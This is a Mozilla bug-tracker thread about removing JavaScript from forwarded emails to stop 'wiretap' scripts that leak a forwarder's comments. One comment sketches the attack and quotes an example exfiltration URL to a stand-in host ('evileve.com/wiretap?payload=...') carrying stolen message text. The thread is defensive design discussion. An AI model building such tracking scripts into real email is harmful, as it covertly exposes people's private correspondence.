Open Bug 67702 Opened 24 years ago Updated 2 years ago

Forwarding mail should remove JavaScript from the message

Categories

(MailNews Core :: Security, enhancement)

Product:
MailNews Core
Component:
Security
Type:
enhancement

Tracking

(Not tracked)

People

(Reporter: hacker, Unassigned)

References

(
URL
)

Details

(Keywords: privacy, Whiteboard: [sg:privacy]) 

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; m18) Gecko/20010202
BuildID:    2001020204

The attached URL describes a recently-discovered security problem with many mail
programs where JavaScript code can be embedded in an HTML mail message that can
track when the message is forwarded and replied to.  Unfortunately, as the
article states, you can't just turn off JavaScript in Mail/News since the
JavaScript is still embedded in the message when you reply or forward.

As a way to counter this security problem, there should be an option (perhaps as
an extension of turning off JavaScript in Mail/News) for Mail to automatically
strip all JavaScript code from outgoing mail.

Reproducible: Didn't try
Steps to Reproduce:
QA > ckritzer
Status: UNCONFIRMED → NEW
Ever confirmed: true
QA Contact: junruh → ckritzer
Hmm, it's an option. This is really the receiving client's responsibility to
fix, not the sending client. Might be a good thing to do though.
a hidden pref to remove (comment out?) JS in messages which are forwarded (or 
replies?) seems reasonable; I could see some IS departments might want to enable 
such a pref.  (made changes to summary)
Summary: Option to delete JavaScript in sent mail → Pref/Option to delete JavaScript when forwarding mail
Future. We need to fix the exploit in our own mail client before we worry about
defending people from other mail clients that haven't addressed the issue.
Status: NEW → ASSIGNED
Target Milestone: --- → Future
Target Milestone: Future → mozilla1.0
Bugs targeted at mozilla1.0 without the mozilla1.0 keyword moved to mozilla1.0.1 
(you can query for this string to delete spam or retrieve the list of bugs I've 
moved)
Target Milestone: mozilla1.0 → mozilla1.0.1
Target Milestone: mozilla1.0.1 → Future
QA Contact: ckritzer → bsharma
Product: MailNews → Core
Why are wiretap exploits "really the receiving client's responsibility to fix,
not the sending client's"?  I would argue that this is primarily the sending
client's responsibility because 

(1) The sending client is the one carelessly combining untrusted scripts with
its own content.

(2) It's really hard to fix this in the receiving client without disabling
JavaScript completely or limiting JavaScript to a tiny whitelist of DOM 0
functions.  See bug 66938, bug 84545, bug 152701, bug 309258, and bug 309228.

IMO, the sending client should strip scripts from at least messages that are
forwarded inline.  (Thunderbird 1.5 Beta 1 includes such scripts twice - wtf?)
Assignee: security-bugs → nobody
Status: ASSIGNED → NEW
QA Contact: bsharma
Target Milestone: Future → ---
Bug 66938 comment 27 and bug 66938 comment 28 seem to agree with me...
Blocks: 84545
Summary: Pref/Option to delete JavaScript when forwarding mail → Forwarding mail should remove JavaScript from the message
Keywords: privacy
Whiteboard: [sg:privacy]
QA Contact: security
Product: Core → MailNews Core
Dan with CAPS being enabled now, would this still work ?
By "CAPS being enabled" do you mean "JavaScript in messages being disabled" (note that since DOM quickstubbing came online, CAPS is often short-circuited: disabling JS uses a different mechanism)?  If so, Thunderbird users are no longer potentially vulnerable as recipients, but that's because JS in messages is not executed.

It would also be worthwhile to sanitize outbound messages as suggested by this bug.
Since these wiretap bugs lacked sufficient in-bug context even when the privacyfoundation URL worked:

Evil Eve sends mail to Alice, knowing she'll forward it to Bob, and wanting to know what Alice says about it in her forward. Bob trusts Alice, so he automatically loads remote images in her mail. Alice uses Tb3, so Eve's script doesn't execute when Alice reads the email, but Bob uses an old Tb (our CAPS attempt at protection was full of holes for years) with JS enabled, or OE with JS enabled, and so when he reads Alice's forward, the script executes, gets the whole text of the email including Alice's added comments, and creates an image with src="evileve.com/wiretap?payload=Bob%20can%20you%20believe%20this%20load%20of...

Alice is the victim, it's her privacy that's being impacted, and she's our user. We can't limit the clients that view email we send for her, so the only way to protect her is to strip out anything that could be executed as script.

(Of course, as any of the thousands of people whose full-time job is to strip out things that might be XSS attempts in content that will be displayed in web pages would tell us, "just strip out script" isn't all that easy.)
Removing myslef on all the bugs I'm cced on. Please NI me if you need something on MailNews Core bugs from me.
Severity: normal → S3
You need to log in before you can comment on or make changes to this bug.